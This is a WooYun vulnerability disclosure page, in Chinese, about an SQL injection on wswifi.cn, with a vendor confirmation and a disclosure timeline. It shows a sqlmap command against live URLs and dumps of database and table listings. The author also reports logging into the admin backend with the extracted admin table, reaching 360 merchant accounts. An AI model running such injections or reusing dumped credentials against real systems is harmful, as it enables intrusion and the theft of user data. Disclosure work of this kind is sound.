当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196946

漏洞标题:wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

相关厂商:wswifi.cn

漏洞作者: 黑色键盘丶

提交时间:2016-04-22 14:05

修复时间:2016-06-06 14:10

公开时间:2016-06-06 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

RT 可垮裤查询

详细说明:

注入点;sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
http://ws.wswifi.cn/news_text.asp?newsid=25


数据库信息

back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] Engineering_database
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ws_weigou
[*] wswifi
[*] xhzA8_V10_2013


表信息

Database: wswifi
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.user_Browse_record       | 261096  |
| dbo.free_renzheng            | 211319  |
| dbo.setggao_Browse_record    | 43750   |
| dbo.user_Browse_allcount     | 28472   |
| dbo.china                    | 3295    |
| dbo.user_login               | 2640    |
| dbo.Businesses_data          | 1451    |
| dbo.column_type              | 1416    |
| dbo.user_prozan              | 1345    |
| dbo.user_singin              | 1208    |
| dbo.Businesses_user          | 1180    |
| dbo.product                  | 849     |
| dbo.[user_renzheng_count---] | 450     |
| dbo.setggao_allcount         | 373     |
| dbo.businesses               | 360     |
| dbo.product_query            | 327     |
| dbo.propinglun               | 299     |
| dbo.Merchants                | 273     |
| dbo.Businessesuser_roll      | 260     |
| dbo.setggao_click_record     | 230     |
| dbo.pangolin_test_table      | 192     |
| dbo.job_Browse_record        | 190     |
| dbo.user_renzheng            | 96      |
| dbo.kehu_fahuo               | 87      |
| dbo.Businessesuser_active    | 83      |
| dbo.kehu_info                | 73      |
| dbo.user_renzheng_weixin     | 47      |
| dbo.rizhi_info               | 46      |
| dbo.agent_apply              | 33      |
| dbo.index_news               | 29      |
| dbo.Businesses_Transfer      | 28      |
| dbo.agent                    | 27      |
| dbo.setggao_fabu             | 20      |
| dbo.agent_salesman           | 18      |
| dbo.industry                 | 11      |
| dbo.Identification_type      | 10      |
| dbo.[setggao_order---]       | 9       |
| dbo.setggao                  | 7       |
| dbo.index_help               | 5       |
| dbo.column_display_mode      | 4       |
| dbo.agent_jibie              | 3       |
| dbo.agent_job                | 3       |
| dbo.wswifiadmin              | 3       |
| dbo.column_leixing           | 2       |
| dbo.job_Apply                | 2       |
| dbo.[ggao_send----]          | 1       |
| dbo.[ggao_type--]            | 1       |
| dbo.setggao_send             | 1       |
+------------------------------+---------+


跑出了wswifiadmin 表后登陆后台 360个商家

56.png


都是网咖 ktv等
垮裤查询 这里包括订单等信息

Database: ws_weigou
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.user_order_awardnum       | 407332  |
| dbo.user_browsepro_record     | 269214  |
| dbo.user_liulan_record        | 111459  |
| dbo.user_Integral_detailed    | 4424    |
| dbo.user_login                | 3807    |
| dbo.china                     | 3295    |
| dbo.user_order                | 3074    |
| dbo.wg_user                   | 2421    |
| dbo.user_consumption_record   | 542     |
| dbo.[user_browsepro_record--] | 523     |
| dbo.user_recharge_record      | 507     |
| dbo.Product_shopping_trolley  | 429     |
| dbo.user_red_envelopes        | 357     |
| dbo.Product_award             | 59      |
| dbo.category                  | 30      |
| dbo.product                   | 25      |
| dbo.uploadapp_pro             | 24      |
| dbo.user_delivery_address     | 18      |
| dbo.user_award_public         | 15      |
| dbo.crowdfunding_pro          | 14      |
| dbo.crowdfunding_order_record | 10      |
| dbo.crowdfunding_order        | 8       |
| dbo.friend_pro                | 7       |
| dbo.user_grade                | 2       |
| dbo.crowdfunding_order_temp   | 1       |
| dbo.uploadadd                 | 1       |
| dbo.user_order_temp           | 1       |
| dbo.wsweigou_admin            | 1       |
+-------------------------------+---------+


Database: Engineering_database
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.ggao_showcount_beifen        | 25196092 |
| dbo.ggao_showcount               | 3060837 |
| dbo.[ad_zhuomian_showcount--]    | 1648957 |
| dbo.netbar_user_count            | 561529  |
| dbo.ggao_clickcount              | 486537  |
| dbo.ggao_allcount                | 408032  |
| dbo.[ad_renzheng_lunbo_count--]  | 328725  |
| dbo.rand_six_password            | 200000  |
| dbo.netbar_user_allcount         | 67232   |
| dbo.[netbar_zhuomian_allcount--] | 63633   |
| dbo.netbar_user_login            | 47431   |
| dbo.netbar_user                  | 41135   |
| dbo.[ad_zhuomian_clickcount--]   | 33934   |
| dbo.user_recharge                | 8927    |
| dbo.netbar_login                 | 7432    |
| dbo.china                        | 3295    |
| dbo.ggao_fabu                    | 3008    |
| dbo.[netbar_lunbo_allcount--]    | 1539    |
| dbo.product                      | 396     |
| dbo.Product_query                | 312     |
| dbo.netbar                       | 281     |
| dbo.Package                      | 176     |
| dbo.ggao_send                    | 38      |
| dbo.netbar_admin                 | 29      |
| dbo.salesman                     | 21      |
| dbo.[ad_zhuomian--]              | 17      |
| dbo.[Engineering_user--]         | 9       |
| dbo.ggao_zizhu_allcount          | 9       |
| dbo.netbar_user_renzheng         | 8       |
| dbo.[ad_renzheng_lunbo--]        | 3       |
| dbo.Engineering_admin            | 3       |
| dbo.ggao_type                    | 3       |
| dbo.[ad_shezhi--]                | 1       |
+----------------------------------+---------+


dbo.netbar_user_count | 561529
56w用户信息

4567.png

漏洞证明:

注入点;sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
http://ws.wswifi.cn/news_text.asp?newsid=25


数据库信息

back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] Engineering_database
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ws_weigou
[*] wswifi
[*] xhzA8_V10_2013


表信息

Database: wswifi
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.user_Browse_record       | 261096  |
| dbo.free_renzheng            | 211319  |
| dbo.setggao_Browse_record    | 43750   |
| dbo.user_Browse_allcount     | 28472   |
| dbo.china                    | 3295    |
| dbo.user_login               | 2640    |
| dbo.Businesses_data          | 1451    |
| dbo.column_type              | 1416    |
| dbo.user_prozan              | 1345    |
| dbo.user_singin              | 1208    |
| dbo.Businesses_user          | 1180    |
| dbo.product                  | 849     |
| dbo.[user_renzheng_count---] | 450     |
| dbo.setggao_allcount         | 373     |
| dbo.businesses               | 360     |
| dbo.product_query            | 327     |
| dbo.propinglun               | 299     |
| dbo.Merchants                | 273     |
| dbo.Businessesuser_roll      | 260     |
| dbo.setggao_click_record     | 230     |
| dbo.pangolin_test_table      | 192     |
| dbo.job_Browse_record        | 190     |
| dbo.user_renzheng            | 96      |
| dbo.kehu_fahuo               | 87      |
| dbo.Businessesuser_active    | 83      |
| dbo.kehu_info                | 73      |
| dbo.user_renzheng_weixin     | 47      |
| dbo.rizhi_info               | 46      |
| dbo.agent_apply              | 33      |
| dbo.index_news               | 29      |
| dbo.Businesses_Transfer      | 28      |
| dbo.agent                    | 27      |
| dbo.setggao_fabu             | 20      |
| dbo.agent_salesman           | 18      |
| dbo.industry                 | 11      |
| dbo.Identification_type      | 10      |
| dbo.[setggao_order---]       | 9       |
| dbo.setggao                  | 7       |
| dbo.index_help               | 5       |
| dbo.column_display_mode      | 4       |
| dbo.agent_jibie              | 3       |
| dbo.agent_job                | 3       |
| dbo.wswifiadmin              | 3       |
| dbo.column_leixing           | 2       |
| dbo.job_Apply                | 2       |
| dbo.[ggao_send----]          | 1       |
| dbo.[ggao_type--]            | 1       |
| dbo.setggao_send             | 1       |
+------------------------------+---------+


跑出了wswifiadmin 表后登陆后台 360个商家

56.png


都是网咖 ktv等
垮裤查询 这里包括订单等信息

Database: ws_weigou
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.user_order_awardnum       | 407332  |
| dbo.user_browsepro_record     | 269214  |
| dbo.user_liulan_record        | 111459  |
| dbo.user_Integral_detailed    | 4424    |
| dbo.user_login                | 3807    |
| dbo.china                     | 3295    |
| dbo.user_order                | 3074    |
| dbo.wg_user                   | 2421    |
| dbo.user_consumption_record   | 542     |
| dbo.[user_browsepro_record--] | 523     |
| dbo.user_recharge_record      | 507     |
| dbo.Product_shopping_trolley  | 429     |
| dbo.user_red_envelopes        | 357     |
| dbo.Product_award             | 59      |
| dbo.category                  | 30      |
| dbo.product                   | 25      |
| dbo.uploadapp_pro             | 24      |
| dbo.user_delivery_address     | 18      |
| dbo.user_award_public         | 15      |
| dbo.crowdfunding_pro          | 14      |
| dbo.crowdfunding_order_record | 10      |
| dbo.crowdfunding_order        | 8       |
| dbo.friend_pro                | 7       |
| dbo.user_grade                | 2       |
| dbo.crowdfunding_order_temp   | 1       |
| dbo.uploadadd                 | 1       |
| dbo.user_order_temp           | 1       |
| dbo.wsweigou_admin            | 1       |
+-------------------------------+---------+


Database: Engineering_database
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| dbo.ggao_showcount_beifen        | 25196092 |
| dbo.ggao_showcount               | 3060837 |
| dbo.[ad_zhuomian_showcount--]    | 1648957 |
| dbo.netbar_user_count            | 561529  |
| dbo.ggao_clickcount              | 486537  |
| dbo.ggao_allcount                | 408032  |
| dbo.[ad_renzheng_lunbo_count--]  | 328725  |
| dbo.rand_six_password            | 200000  |
| dbo.netbar_user_allcount         | 67232   |
| dbo.[netbar_zhuomian_allcount--] | 63633   |
| dbo.netbar_user_login            | 47431   |
| dbo.netbar_user                  | 41135   |
| dbo.[ad_zhuomian_clickcount--]   | 33934   |
| dbo.user_recharge                | 8927    |
| dbo.netbar_login                 | 7432    |
| dbo.china                        | 3295    |
| dbo.ggao_fabu                    | 3008    |
| dbo.[netbar_lunbo_allcount--]    | 1539    |
| dbo.product                      | 396     |
| dbo.Product_query                | 312     |
| dbo.netbar                       | 281     |
| dbo.Package                      | 176     |
| dbo.ggao_send                    | 38      |
| dbo.netbar_admin                 | 29      |
| dbo.salesman                     | 21      |
| dbo.[ad_zhuomian--]              | 17      |
| dbo.[Engineering_user--]         | 9       |
| dbo.ggao_zizhu_allcount          | 9       |
| dbo.netbar_user_renzheng         | 8       |
| dbo.[ad_renzheng_lunbo--]        | 3       |
| dbo.Engineering_admin            | 3       |
| dbo.ggao_type                    | 3       |
| dbo.[ad_shezhi--]                | 1       |
+----------------------------------+---------+


dbo.netbar_user_count | 561529
56w用户信息

4567.png

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-22 14:08

厂商回复:

高危漏洞

最新状态:

暂无